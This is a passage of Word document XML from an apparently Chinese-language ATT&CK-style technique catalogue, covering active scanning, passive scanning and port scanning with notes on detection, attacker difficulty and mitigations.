              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B8561EC" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F"/>
    <w:p w14:paraId="270A8F8D" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动扫描是向终端节点发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并分析响应的行为，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>识别通信系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B31CE84" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CC83EF" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通用</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>措施</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（是</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分）：是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EE2377" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F"/>
    <w:p w14:paraId="2AD37C8D" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主动扫描</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>nternet</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上是一项预期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的、频繁</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>活动。主动扫描技术</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具通常会产生良性流量，不需要防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行进一步调查，因为没有可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的防御措施。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种活动很频繁</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使得任何</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防守程序</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都很难</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>追捕到</w:t>
      </w:r>
      <w:r w:rsidRPr="0007771A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此常常被忽视。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5DEB6B" w14:textId="072A862A" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidR="00920515">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>难度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441D1235" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>易于攻击者</w:t>
      </w:r>
      <w:r>
        <w:t>执行（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5046C9" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F"/>
    <w:p w14:paraId="19BC1CB2" w14:textId="45096E05" w:rsidR="00D6184F" w:rsidRPr="00D6184F" w:rsidRDefault="00D6184F" w:rsidP="00D6184F">
      <w:r w:rsidRPr="0083319F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：用于侦察和检测地址、路由、版本号、补丁级别、运行的协议</w:t>
      </w:r>
      <w:r w:rsidRPr="0083319F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="0083319F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务等的各种可用工具和数据源。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB345D9" w14:textId="5F1BE7F6" w:rsidR="00A0413E" w:rsidRDefault="00FF125B" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>被动</w:t>
      </w:r>
      <w:r w:rsidR="00F9406C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="7699C039" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A8B6C14" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00DD12CC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="002D6F5B">
              <w:t xml:space="preserve"> T1253</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57EAD93C" w14:textId="77777777" w:rsidR="00D6184F" w:rsidRDefault="00A0413E" w:rsidP="00DD12CC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00D6184F">
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EE15C2C" w14:textId="679CBC72" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00DD12CC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="002D6F5B">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03704C69" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:spacing w:after="312"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06301BCF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BB43A8" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="006E3693">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>被动扫描是查看现有网络流量以识别有关通信系统信息的行为。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7887F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BB43A8" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C6818" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以通过普通防御检测（是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分）：否</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA25994" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BB43A8" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：不生成可检测的网络流量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45535C28" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者难度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0338C2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对手很容易（是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>否）：是的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A5363A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明：易于操作但需要可访问此数据的有利位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551E4169" w14:textId="5E4E5456" w:rsidR="00A0413E" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>扫描</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A7662" w14:paraId="57700344" w14:textId="77777777" w:rsidTr="001A7662">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FB596CA" w14:textId="2132CFB6" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="00A0413E">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>H1101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27926517" w14:textId="77777777" w:rsidR="00E261DC" w:rsidRDefault="00E261DC" w:rsidP="00E261DC">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r>
              <w:t>技术信息收集</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="441F7417" w14:textId="1A158E5C" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="00A0413E">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>macOS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AC8414B" w14:textId="6DB14A86" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="00A0413E">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EC645C9" w14:textId="16274768" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:leftChars="0" w:left="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>NTA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>IDS/IPS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、</w:t>
            </w:r>
            <w:r w:rsidR="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="001A7662">
              <w:t>irewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E13DE8D" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="501A6E87" w14:textId="308BAC86" w:rsidR="003F09A8" w:rsidRDefault="001A7662" w:rsidP="001A7662">
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描程序可以通过扫描网络查看网络上的内容来查看网络中存在的内容，从而防止黑客入侵。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描程序提供了网络布局的基本视图。</w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001A7662">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它们可以帮助识别可能导致严重安全漏洞的未授权主机或应用程序以及网络主机配置错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796668DE" w14:textId="77777777" w:rsidR="001A7662" w:rsidRDefault="001A7662" w:rsidP="001A7662"/>
    <w:p w14:paraId="4D7D7CB9" w14:textId="77777777" w:rsidR="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2AB5F9" w14:textId="7143BECF" w:rsidR="0069302E" w:rsidRPr="0069302E" w:rsidRDefault="0069302E" w:rsidP="0069302E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>果您想要可靠可应用的服务（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），那么</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将能够找到它。</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般来说，端口扫描不是威胁</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全性不应该依赖于连攻击者都不知道的服务。</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的非标准端口主要用于降低日志噪声，因为很多暴力破解使用默认端口</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidRPr="0069302E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="7898"/>
      </w:tblGrid>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00567ECD" w14:paraId="0088EC2E" w14:textId="77777777" w:rsidTr="0069302E">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6226A809" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00567ECD" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="00095184" w14:textId="77777777" w:rsidR="0069302E" w:rsidRPr="00567ECD" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0069302E" w:rsidRPr="00A65911" w14:paraId="300D3A91" w14:textId="77777777" w:rsidTr="0069302E">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD94F2C" w14:textId="443CFDA7" w:rsidR="0069302E" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="0069302E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId271" w:history="1">
              <w:r w:rsidR="0069302E">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>知己知彼</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7898" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EBEFD6D" w14:textId="0F3BF06C" w:rsidR="0069302E" w:rsidRPr="00A65911" w:rsidRDefault="0069302E" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>首先了解您拥有的资产以及攻击者的目标，然后端口扫描自检来知道你的弱点，从而了解端口扫描可以做什么和不能做什么</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
